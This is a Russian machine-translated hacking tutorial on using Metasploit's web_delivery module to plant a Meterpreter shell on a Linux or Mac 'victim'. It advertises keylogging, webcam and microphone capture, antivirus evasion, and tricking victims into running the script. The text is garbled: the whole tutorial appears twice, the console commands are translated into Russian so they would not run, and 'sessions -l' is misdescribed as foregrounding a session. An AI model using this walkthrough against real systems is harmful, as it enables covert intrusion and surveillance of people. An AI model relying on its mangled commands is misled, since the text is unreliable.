Добро пожаловать обратно, мои начинающие кибервоины!
Metasploit, один из моих любимых инструментов для взлома и пентестинга, обладает таким обширным функционалом, что даже после моих многочисленных обучающих программ я лишь поверхностно рассмотрел его возможности. Например, его можно использовать с Nexpose для сканирования уязвимостей, с nmap для сканирования портов, а благодаря многочисленным вспомогательным модулям — практически безграничные возможности для взлома.
Среди модулей эксплойтов есть категория, которую мы не рассматривали, — эксплойты веб-доставки. Эти эксплойты позволяют нам открыть веб-сервер на атакуемой системе и затем сгенерировать простую скриптовую команду, которая при выполнении на жертве откроет оболочку Meterpreter на целевой системе. Этот эксплойт веб-доставки может использовать скрипты Python, PHP или Windows PowerShell.
Конечно, ваша задача — доставить скрипт на целевую машину. Это, вероятно, означает, что вам потребуется физический доступ к системе или поместить код в безобидный на вид объект, который жертва будет вынуждена выполнить.
В этом руководстве мы будем эксплуатировать систему Linux или Mac. Поскольку обе системы являются UNIX-подобными, в них по умолчанию встроены интерпретаторы Python. Если нам удастся получить команду скрипта, сгенерированную этим эксплойтом, на целевой системе, мы получим полный контроль над ней, включая регистрацию нажатий клавиш, включение веб-камеры, запись с микрофона, а также чтение и удаление любых файлов в системе.
Давайте начнем.
Шаг 1 : Откройте терминал
Первый шаг, конечно, — запустить Kali и открыть терминал.
Шаг 2 : Запустите Metasploit и загрузите эксплойт
Затем запустите Metasploit, введя:
kali > msfconsole
Это должно открыть msfconsole, как показано ниже.
Затем нам нужно загрузить эксплойт:
msf > использовать exploit/multi/script/web_delivery
Устанавливаем IP нашей атакующей системы:
msf > установить LHOST 192.168.181.153
И устанавливаем порт, который хотим использовать:
msf > установить LPORT 4444
Конечно, я использую свой частный IP-адрес в своей лаборатории, но если цель находится за пределами вашей локальной сети, вам, скорее всего, придется использовать свой публичный IP-адрес, а затем переадресовать порт.
Шаг 3: Показать параметры
Теперь, когда эксплойт загружен и готов к использованию, давайте рассмотрим его параметры. Введите:
msf > показать параметры
Похоже, мы настроили все необходимые параметры. Прежде чем продолжить, давайте узнаем больше информации об этом эксплойте. Введите:
MSF > информация
Как вы можете видеть выше, этот эксплойт запускает веб-сервер на нашей атакующей системе, и при выполнении сгенерированной команды на целевой системе загружается полезная нагрузка. Кроме того, эта атака не записывает данные на диск, поэтому она не должна вызывать срабатывание антивирусного ПО на системе жертвы.
Шаг 4 : Запуск эксплойта
Следующий шаг — запуск эксплойта. Это запустит веб-сервер на нашей атакующей системе и сгенерирует команду Python, которую мы можем использовать для подключения к этому веб-серверу. Однако перед этим нам нужно установить цель на 0, выбрав эксплойт Python.
msf > установить цель 0
Теперь мы можем ввести exploit:
msf > эксплуатировать
Обратите внимание, что последнее, что пишет этот эксплойт, — «Выполните следующую команду на целевой машине», а затем следует команда, которую нам нужно выполнить. Скопируйте эту команду.
Шаг 5 : Выполните команду на Система жертв
Затем выполните эту команду на компьютере-жертве. В данном случае я использую систему Ubuntu 14.04. Перед командой необходимо указать sudo, так как для её выполнения требуются права root.
Затем нажмите Enter. Вернувшись в систему Kali, вы увидите, что на целевой системе запущен Meterpreter! Это устройство принадлежит нам!
Изначально Meterpreter работает в фоновом режиме. Чтобы вывести его на передний план, введите:
msf > сеансы -l
Это выводит сеанс Meterpreter на передний план, и мы получаем приглашение meterpreter!
Для управления системой мы можем запускать команды или скрипты Meterpreter, хотя большинство скриптов написано для систем Windows.
Metasploit, один из моих любимых инструментов для взлома и пентестинга, обладает таким обширным функционалом, что даже после моих многочисленных обучающих программ я лишь поверхностно рассмотрел его возможности. Например, его можно использовать с Nexpose для сканирования уязвимостей, с nmap для сканирования портов, а благодаря многочисленным вспомогательным модулям — практически безграничные возможности для взлома.
Среди модулей эксплойтов есть категория, которую мы не рассматривали, — эксплойты веб-доставки. Эти эксплойты позволяют нам открыть веб-сервер на атакуемой системе и затем сгенерировать простую скриптовую команду, которая при выполнении на жертве откроет оболочку Meterpreter на целевой системе. Этот эксплойт веб-доставки может использовать скрипты Python, PHP или Windows PowerShell.
Конечно, ваша задача — доставить скрипт на целевую машину. Это, вероятно, означает, что вам потребуется физический доступ к системе или поместить код в безобидный на вид объект, который жертва будет вынуждена выполнить.
В этом руководстве мы будем эксплуатировать систему Linux или Mac. Поскольку обе системы являются UNIX-подобными, в них по умолчанию встроены интерпретаторы Python. Если нам удастся получить команду скрипта, сгенерированную этим эксплойтом, на целевой системе, мы получим полный контроль над ней, включая регистрацию нажатий клавиш, включение веб-камеры, запись с микрофона, а также чтение и удаление любых файлов в системе.
Давайте начнем.
Шаг 1 : Откройте терминал
Первый шаг, конечно, — запустить Kali и открыть терминал.
Шаг 2 : Запустите Metasploit и загрузите эксплойт
Затем запустите Metasploit, введя:
kali > msfconsole
Это должно открыть msfconsole, как показано ниже.
Затем нам нужно загрузить эксплойт:
msf > использовать exploit/multi/script/web_delivery
Устанавливаем IP нашей атакующей системы:
msf > установить LHOST 192.168.181.153
И устанавливаем порт, который хотим использовать:
msf > установить LPORT 4444
Конечно, я использую свой частный IP-адрес в своей лаборатории, но если цель находится за пределами вашей локальной сети, вам, скорее всего, придется использовать свой публичный IP-адрес, а затем переадресовать порт.
Шаг 3: Показать параметры
Теперь, когда эксплойт загружен и готов к использованию, давайте рассмотрим его параметры. Введите:
msf > показать параметры
Похоже, мы настроили все необходимые параметры. Прежде чем продолжить, давайте узнаем больше информации об этом эксплойте. Введите:
MSF > информация
Как вы можете видеть выше, этот эксплойт запускает веб-сервер на нашей атакующей системе, и при выполнении сгенерированной команды на целевой системе загружается полезная нагрузка. Кроме того, эта атака не записывает данные на диск, поэтому она не должна вызывать срабатывание антивирусного ПО на системе жертвы.
Шаг 4 : Запуск эксплойта
Следующий шаг — запуск эксплойта. Это запустит веб-сервер на нашей атакующей системе и сгенерирует команду Python, которую мы можем использовать для подключения к этому веб-серверу. Однако перед этим нам нужно установить цель на 0, выбрав эксплойт Python.
msf > установить цель 0
Теперь мы можем ввести exploit:
msf > эксплуатировать
Обратите внимание, что последнее, что пишет этот эксплойт, — «Выполните следующую команду на целевой машине», а затем следует команда, которую нам нужно выполнить. Скопируйте эту команду.
Шаг 5 : Выполните команду на Система жертв
Затем выполните эту команду на компьютере-жертве. В данном случае я использую систему Ubuntu 14.04. Перед командой необходимо указать sudo, так как для её выполнения требуются права root.
Затем нажмите Enter. Вернувшись в систему Kali, вы увидите, что на целевой системе запущен Meterpreter! Это устройство принадлежит нам!
Изначально Meterpreter работает в фоновом режиме. Чтобы вывести его на передний план, введите:
msf > сеансы -l
Это выводит сеанс Meterpreter на передний план, и мы получаем приглашение meterpreter!
Для управления системой мы можем запускать команды или скрипты Meterpreter, хотя большинство скриптов написано для систем Windows.